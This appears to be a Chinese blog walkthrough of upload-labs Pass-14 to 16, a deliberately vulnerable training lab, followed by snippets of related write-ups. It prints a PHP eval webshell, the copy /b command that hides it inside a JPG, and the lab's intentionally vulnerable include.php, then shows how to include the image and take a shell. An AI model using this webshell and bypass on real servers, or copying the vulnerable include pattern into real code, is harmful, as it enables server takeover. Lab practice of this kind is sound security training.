upload-labs pass-14~16

最新推荐文章于 2024-05-13 09:14:43 发布
最新推荐文章于 2024-05-13 09:14:43 发布
阅读量246 收藏
点赞数
分类专栏: upload-labs 文章标签: 安全 php windows apache firefox
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_50339082/article/details/118251986
版权

upload-labs pass-14

Pass-14

Pass-14~Pass-16是一样的通过方法,只是里面使用的函数不同。

先看一下源码(图片马):

function getReailFileType($filename){
    $file = fopen($filename, "rb");
    $bin = fread($file, 2); //只读2字节
    fclose($file);
    $strInfo = @unpack("C2chars", $bin);    
    $typeCode = intval($strInfo['chars1'].$strInfo['chars2']);    
    $fileType = '';    
    switch($typeCode){      
        case 255216:            
            $fileType = 'jpg';
            break;
        case 13780:            
            $fileType = 'png';
            break;        
        case 7173:            
            $fileType = 'gif';
            break;
        default:            
            $fileType = 'unknown';
        }    
        return $fileType;
}

$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
    $temp_file = $_FILES['upload_file']['tmp_name'];
    $file_type = getReailFileType($temp_file);

    if($file_type == 'unknown'){
        $msg = "文件未知,上传失败!";
    }else{
        $img_path = UPLOAD_PATH."/".rand(10, 99).date("YmdHis").".".$file_type;
        if(move_uploaded_file($temp_file,$img_path)){
            $is_upload = true;
        } else {
            $msg = "上传出错!";
        }
    }
}

1.利用windows 命令
准备一个木马,以php一句话为例,文件名为pass.php,内容如下:

<?php
@eval($_POST['pass']);
?>

2.准备一张图片,文件名为555.jpg,然后再文件的目录cmd下,使用命令:

copy 555.jpg/b+pass.php/a muma.jpg

命令与参数说明:
copy:将文件复制或者是合并,/b的意思是以前边图片二进制格式为主,进行合并,合并后的文件依旧是二进制文件,实用于图像/声音等二进制文件。/a的意思是指定以ASCII格式复制,合并文件。用于jpeg等文本类型文档。
在这里插入图片描述

生成了一张图片木马,文件名为muma.jpg。
在这里插入图片描述
比较555.jpg与muma.jpg的区别:
在这里插入图片描述
当然,这种方法做的图片马不一定成功,我们可以用一些小工具来生成,这样就有可以成功,如:edjpgcom.exe。

3.把做好的图片马传上去。
在这里插入图片描述
利用include.php实现文件包含(靶场自带的):

<?php
/*
本页面存在文件包含漏洞,用于测试图片马是否能正常运行!
*/
header("Content-Type:text/html;charset=utf-8");
$file = $_GET['file'];
if(isset($file)){
    include $file;
}else{
    show_source(__file__);
}
?>

到了此步就可以查看图片位置,直接包含图片拿shell了:

http://127.0.0.1/upload/include.php?file=upload/1520210626170848.jpg

菜刀连接一句话木马图片:
在这里插入图片描述
在这里插入图片描述

weixin_50339082
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
upload-labs Pass-01--Pass-14
weixin_47387913的博客
03-05 367
upload-labs pass-01~pass-14 接pikachu靶场的练习的文件上传部分,upload-labs靶场是收集了渗透测试和CTF中遇到的各种上传漏洞,对文件上传有全面的了解,若有错误请前辈们指正。 Pass-01 上传一个webshell到服务器,上传图片成功,试试上传一个phpinfo.php文件。 查看提示和源码 只能上传这3种文件,那么通过burp抓包修改文件类型。 上传成功,复制图像地址查看上传结果。 Burp抓包修改文件类型可上传成...
安装upload-labs
10-22
安装upload-labs 安装upload-labs是网安入门教程系列的一部分,旨在帮助初学者学习文件上传漏洞的基础知识和实践经验。在这篇文章中,我们将一步步指导您如何安装upload-labs靶场,以便更好地学习文件上传漏洞。 ...
upload-labs:pass-14
羽的博客
07-11 1202
这里是白名单了。而且题目叫传图片马。 所以,首先制作图片马。 图片马制作方法一 图片马制作方法二 这里要说清:上传的图片马并不会直接执行,你用菜刀或者蚁剑直接连图片马也是不可以的,因为后端程序不会莫名其妙的把图片解析成二进制码。所以要配合文件包含漏洞,upload-labs提供了这样的漏洞。 <?php /* 本页面存在文件包含漏洞,用于测试图片马是否能正常运行! */ header("Content-Type:text/html;charset=utf-8"); $file...
[网络安全]upload-labs Pass-14 解题详析_upload-labs-linux pass14(1)
最新发布
2401_84972580的博客
05-13 362
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
upload-labs】————15、Pass-14
Fly_鹏程万里
08-15 561
闯关界面: 判断是前端检测还收后端检测 查看源代码: 依旧采用刚才的方式利用即可: 成功上传:
upload-labs靶场-pass-14
weixin_64809022的博客
02-27 89
图片马
Upload-labs文件上传漏洞(getimagesize函数)——Pass14
Zichel77的博客
07-29 866
0×00 题目概述 与13差不多 但是不是读取字节,而是使用函数检查 0×01 源代码 function isImage($filename){ $types = '.jpeg|.png|.gif'; if(file_exists($filename)){ $info = getimagesize($filename); $ext = image_type_to_extension($info[2]); if(strip.
WEB渗透学习-upload-labs靶场
04-20
**WEB渗透学习-upload-labs靶场详解** 在网络安全领域,特别是Web渗透测试中,了解和掌握文件上传漏洞是至关重要的技能。"upload-labs"靶场是一个专为学习和实践文件上传漏洞设计的平台,它提供了21个关卡,从基础...
upload-labs-master.zip
06-22
【描述】描述中的 "文件上传漏洞小游戏靶场upload-labs-master/upload-labs-master/upload-labs-master/upload-labs-master" 显示这是一个针对文件上传漏洞的系列练习,通过多次嵌套的目录结构,可能旨在模拟不同...
UPLOAD-LABS详细解题步骤
05-17
UPLOAD-LABS详细解题步骤 UPLOAD-LABS是一个网络安全靶场,旨在帮助用户练习文件上传的安全知识。该靶场提供了多个关卡,每个关卡都有一定的安全挑战和限制,旨在考验用户的安全知识和技术。 在开始之前,需要先...
upload-labs19-20以及总结1
08-08
Pass19中,开发者试图通过限制上传文件的扩展名来防止这种攻击,但是他们只检查了保存文件名(`save_name`)是否包含黑名单中的扩展名,而未检查实际上传文件的类型。 以下是该关卡的主要知识点: 1. **文件名...
upload-labs_pass14_pass15_pass16_图片马的制作_结合文件包含漏洞_getimagesize_exif_imagetype
qq_51550750的博客
04-11 1736
pass14-环境说明 phpstudy中php版本为7.3.4nts 补充一点:upload-labs这个靶场要想全部通过,必须要 调整环境(phpstudy的环境不行,就自行搭建一个apachephp的环境),而且在我已经做好的前13关靶场中,php的版本切换非常正常。所以如果你没有做出来,也很正常,关键是要理解各种绕过的姿势。 pass14-提示和源码 检查图标内容开头2个字节 这里牵扯到一个知识点。先买个小关子。 这一关跟前几关都很不一样: 要求上传的是图片马。 源码: function g
[网络安全]upload-labs Pass-14 解题详析
等风来
08-16 4288
可知其检测了文件头信息,此时仅抓包修改文件后缀名不可绕过。将1.php与1.png合并为shell.php即可。故文件包含、传参执行命令成功。成功得到shell.png。
文件上传复习(upload-labs14-17关)
2302_80935968的博客
04-25 905
basename— 返回路径中的文件名部分给出一个包含有指向一个文件的全路径的字符串,本函数返回基本的文件名。Notebasename()纯粹基于输入字符串操作, 它不会受实际文件系统和类似 ".." 的路径格式影响。例子如下:php?1) sudoers3) passwd4) etc5) .6)imagecreatefromgif():创建一块画布,并从 GIF 文件或 URL 地址载入一副图像。
upload-labs pass10-14
x_13579的博客
03-04 145
在url中%00表示ascii码中的0,而0作为特殊字符保留,表示字符结束,也就是说,在保存文件的时候,如果路径参数(例: $img_path)中出现了%00,就会认为路径到这里就已经结束了,从而忽略后面一系列的参数,比如$img_path = ../upload/2.php%00/2.jpg,此时,路径参数的后半部分就会被%00给截断,从而变成$img_path = ../upload/2.php
文件上传漏洞upload-libs pass14
CMACCKK
02-19 422
文件上传漏洞upload-libs pass14 首先查看任务 查看一下源代码 发现仅查看文件内容的前两个字节 不用制作图片马了 因为这样上传的马要使用文件包含漏洞来执行 在服务器上新建一个include.php 代码如下: <?php $filename = $_GET['test']; include($filename); ?> 首先我们对上传的test.p...
upload-labs1-14通关简记
weixin_51641247的博客
02-23 269
第一关 js检查 第二关 Content-Type 第三关 黑名单验证 第四关 黑名单验证(.htaccess绕过) 第五关 黑名单验证(.user.ini) 第六关 大小写绕过 第七关 空格绕过 第八关 点绕过 第九关 ::$DATA绕过
upload-labs】————14Pass-13
Fly_鹏程万里
08-15 726
闯关界面 前端检测还是后端检测判断 查看源代码: 从代码层面来看应该是检测的文件的幻数,那么我们在文件内容的开头增加幻数就OK: 该文件的利用还需要结合“文件包含”来利用~ ...
upload-labs pass6
07-28
- *1* [upload-labs靶场-Pass-06关-思路以及过程](https://blog.csdn.net/weixin_44257023/article/details/122506927)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值